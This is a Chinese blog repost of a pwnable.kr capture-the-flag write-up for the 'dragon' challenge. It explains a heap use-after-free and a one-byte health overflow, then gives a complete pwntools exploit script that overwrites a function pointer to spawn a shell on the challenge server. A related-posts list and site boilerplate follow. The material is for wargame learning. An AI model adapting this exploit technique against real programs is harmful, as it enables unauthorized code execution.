Pwnable.kr

最新推荐文章于 2019-06-10 15:21:09 发布
最新推荐文章于 2019-06-10 15:21:09 发布
阅读量192 收藏
点赞数
文章标签: shell python
原文链接:http://www.cnblogs.com/ZHijack/p/8859208.html
版权

Dragon —— 堆之 uaf

开始堆的学习之旅。

  uaf漏洞利用到了堆的管理中fastbin的特性,关于堆的各种分配方式参见堆之*bin理解

  在SecretLevel函数中,发现了隐藏的system("/bin/sh")调用,虽然无法直接执行,但无疑会是后续进展中的有力武器。

  在和恐龙战斗的函数结束部分,发现了free掉但没有置空的free(dragon)语句,而在对战胜利后恰有开辟相同大小的空间,并自主写入的部分,由此产生了uaf漏洞。

  >>在将dragon的结构体free之后,所指的内存空间会“挂”在fastbin数组下等待下次调用,而没有置空的、原来指向被free空间的dragon指针仍然指向该空间,仍可以在函数中被使用,而之后v2申请的大小和被free的空间的大小相同,会优先从fastbin数组中“摘下来”,此时v2和dragon指针都指向同一块内存空间,所以可以通过对v2的输入和对dragon的调用,实现任意代码执行,所以只要将之前的system(“/bin/sh”)段的地址写入v2,就能获得shell

  这个游戏无法通过正常操作获得胜利,但是龙的生命只有一个byte即最多达到127,不断增长的情况下就可能实现溢出导致生命为负,使用有无敌和回技能点的第一个英雄配合母龙很容易达到。

exp:

 1 #!/usr/bin/env python
 2 # -*-coding=utf-8-*-
 3 from pwn import *
 4 # context.log_level = 'debug'
 5 # io = process("./dragon")
 6 io = remote("pwnable.kr",9004)
 7 elf = ELF("./dragon")
 8 
 9 binsh = 0x804935c
10 sys_addr = elf.symbols["system"]
11 call_sys = 0x8048dbf
12 # to pretend to be defeated at first
13 io.recvuntil("night\n")
14 io.sendline("1")
15 io.recvuntil("cible.\n")
16 io.sendline("1")
17 io.recvuntil("cible.\n")
18 io.sendline("1")
19 io.recvuntil("night\n")
20 io.sendline("1")
21 # to track the mom dragon come out and make it overflow
22 for i in range (4):
23     io.recvuntil("ble.\n")
24     io.sendline("3")
25     io.recvuntil("ble.\n")
26     io.sendline("3")
27     io.recvuntil("ble.\n")
28     io.sendline("2")
29 io.recvuntil("As:\n")
30 # payload = p32(sys_addr) + p32(binsh)
31 payload = p32(call_sys) + '\x00'*8
32 io.send(payload)
33 io.interactive()
View Code

 

转载于:https://www.cnblogs.com/ZHijack/p/8859208.html

aoque9909
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pwnable.kr 简单题目详细笔记汇总
H4ppyD0g的博客
09-12 859
pwnable.kr fd pwnable.kr collision pwnable.kr bof pwnable.kr flag pwnable.kr passcode pwnable.kr random pwnable.kr input pwnable.kr leg pwnable.kr mistake pwnable.kr shellshock pwnable.kr coin1 pwnable.kr lotto pwnable.kr cmd1 pwnable.kr cmd2 pwnable.kr u
黑客练手入门| pwnable.kr—幼儿瓶—01:fd
Young的博客
02-03 673
[TOC] 前言 担心有人不知道pwnable.kr是什么,所以觉得有必要简单介绍一下它。 pwnable.kr介绍 pwnable.kr是一个非商业性的Wargame网站 ,它提供有关系统开发的各种pwn挑战。pwnable.kr的主要目的是'有趣'。并把每个挑战视为游戏。地址:http://pwnable.kr/ 该怎么玩 每个挑战都有对应的标记文件(类似于CTF),您需要阅读该文件并提交给pwnable.kr以获得相应的分数。为了读取标志文件,您需要一些有关编程,逆向工程,漏洞利用,
pwnable.kr详细通关秘籍(二)
xiaoi123的博客
09-27 760
i春秋作家:W1ngs 原文来自:pwnable.kr详细通关秘籍(二) 0x00 input 首先看一下代码: 可以看到程序总共有五步,全部都满足了才可以得到flag,那我们就一步一步来看 这道题考到了很多linux下的基本操作,参数输入、管道符、进程间通信等知识,推荐大家可以先看看《深入理解计算机系统这本书》,补补基础 1、Step1(argv) if(argc != 10...
pwnable.kr wp&总结
Ree的整理与收集
08-30 1019
1.fd2.collision3.bof(python -c ‘print “A” * 52 + “\xbe\xba\xfe\xca”’; cat -) | nc pwnable.kr 9000 python -c 参数 linux | 命令:command 1 | command 2 把command 1的结果传给command 2做参数
pwnable.kr --- bof题解
Yannie's Blog
12-11 1046
题目如下: 我们将文件下载,打开 我们下载完题目中给的两个文件,然后打开bof.c文件,我们可以看到源码: #include <stdio.h> #include <string.h> #include <stdlib.h> void func(int key) { char overflowme[32]; printf(&
apachecn#apachecn-ctf-wiki#PWN-dragon-echo1-echo2-[pwnable.kr]CT
07-25
1. malloc person 2. malloc dragon 3. free dragon
mWeb:避免warning.or.kr
05-29
【标题】"mWeb:避免warning.or.kr"指的是在使用mWeb编辑器或者浏览网页时,如何处理或规避与"warning.or.kr"相关的警告信息。这通常涉及到网络安全、浏览器设置以及可能的网络钓鱼攻击。 【描述】"万维网 避免...
pwnable_kr:壳牌我们玩游戏吗?
05-14
Pwnable.kr 此仓库将保存我对pwnable.kr wargames的解决方案 [婴儿奶瓶] fd 碰撞 转炉 旗帜 密码 随机的 输入 腿 错误 炮击 硬币1 二十一点 乐透 命令1 命令2 af 码图 Memcpy 汇编 取消连结 ...
codeup.kr
03-19
"codeup.kr" 是一个与编程挑战和在线学习平台相关的项目,主要针对C语言的学习者和实践者。这个压缩包中的 "codeup.kr-master" 文件很可能是该项目的主分支或源代码库,通常在GitHub等版本控制系统中,master分支...
boj.kr:解决boj.kr的问题
03-20
【标题】"boj.kr:解决boj.kr的问题" 指的是在Boj.kr这个在线编程平台上遇到的挑战或技术难题。Boj.kr是一个流行的学习和竞技编程平台,主要支持C++等编程语言,用户可以在这里提交代码,解决各种算法问题。 【描述...
pwnable.kr 入门pwn系列教程(1)
NoOneGroup
07-24 3089
博客已经转移 https://noone-hub.github.io/ 前言: 前段时间学了一段时间pwn,因为某些事断了下来,现在开始重新学习,现在立志要真正入门pwn,会编写漏洞利用(利用pwntools),会基本linux命令,因为pwn题目很多都是在linux下的,比较少在windows下。 正文: 今天通过pwnable.kr的第一道题目fd来学习pwn 题目就是这样,题目最...
pwnable.kr之asm
Jason_ZhouYetao的博客
07-23 551
这题我认为主要考察的知识点一个是沙箱中可用函数还有就是shellcode这个大头问题。 首先看看这道题目的代码: root@kali:~# ssh asm@pwnable.kr -p2222 asm@pwnable.kr's password: ____ __ __ ____ ____ ____ _ ___ __ _ ____ | ...
pwnable.kr fd小白成长记
weixin_40514070的博客
05-13 182
FD 使用win+r调出任务管理器 输入上图中的ssh fd@pwnable.kr -p2222 之后输入guest 列出目前目录下的所有文件 由上边的图片我们可以看出flag是属于root用户的,所以我们要搞到查看的权限,这里怎么弄呢,这里就要去看fd.c中的代码 #include <stdio.h> #include <stdlib.h> #include &lt...
pwnable.kr ascii_easy writeup
charlie_heng的专栏
02-12 1720
兜兜转转,又回来这里刷题 这题讲真有点难度,虽然在实际比赛的时候比较少可能会出现这类题…….. 很明显可以用rop,但是rop链只能全部为ascii可见字符…..这就有点难度了 这题其实我想了好几种办法,但是实际用了只有一种,不过在这里也说下 利用rop链将ebx的值改为libc中got表的地址,然后跳转到one gadget 这个本来感觉是最快捷的办法,但是将gadget过滤掉一部分...
pwn学习:pwnable.kr flag
Richard_pl的博客
03-16 501
Day 4: Study pwn via pwnable.kr——collision 写在前面: 记录自己的学习过程,从零开始。。。第 100b 天!!! 首先分析文件 在这里呢我们发现文件是ELF格式的,依次可以判断文件是被压缩的了。这里使用upx -d指定对文件进行解压,之后进行调试。 使用gdb调试程序 这里我们可以看出在main + 13的这条指令使用了一个puts命令,我们...
pwnable.kr --- blackjack题解
Yannie's Blog
12-18 796
题目很有意思。是我们所熟悉的21点游戏。题目的意思是,当我们赢得100万的时候,我们就会get到flag,游戏代码较长放在文末: 其实这个游戏还是很好玩的,一拿到代码,我就首先怀疑会不会还是rand函数用同一个种子的问题,但是阅读了源代码发现并不是这个问题。 于是我就尝试输入了一些非法数据,发现程序对金钱的上限有限制,对下限没有限制。另外我们还注意到,在第二次输入的时候没有了前面的$符号,也就是说...
pwnable.kr-----解题过程】bof
lyuchen65的博客
09-16 2408
#include #include #include void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overflowme); if(key == 0xcafebabe){ system("/bin/sh"); } else {
pwnable.kr fd
潜心学习
02-13 377
一次机缘巧合,让我接触到 CTF 。于是,开启了我的新征程……源地址pwnable.krpwnable.kr源码分析使用 Linux 终端登录到题目中所提供的服务器后,使用 ls 命令查看目录文件。发现当前目录下有三个文件:fd fd.c flag既然有源代码,那我们直接使用 cat 命令查看一下 fd.c 源码。123456789101112131415161718192021#includ...
pwnable.kr】 note
子曰小玖的博客
06-10 784
查看了国外网友Hansoo1018的WriteUp,在此谢谢这位网友。 源代码中的select_menu()函数出现问题 问题出现在红色部分 select_menu()函数以递归方式调用。 如果要在屏幕上再次显示菜单,通常使用while语句或者其他代码完成。递归代码具有更清晰的特点,但是递归迭代越多,堆栈内存就越多。我试图在函数结束时调用Tail Call(Tail Re...
使用python 多线程爬取 https://www.ppomppu.co.kr/zboard/zboard.php?id=freeboard&hotlist_flag=999 网站
最新发布
05-30
这个程序会爬取 https://www.ppomppu.co.kr/zboard/zboard.php?id=freeboard&hotlist_flag=999 网站的前5页内容,并使用5个线程进行爬取,提高爬取效率。 你可以根据需要修改程序中的线程数量和爬取页面的数量。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值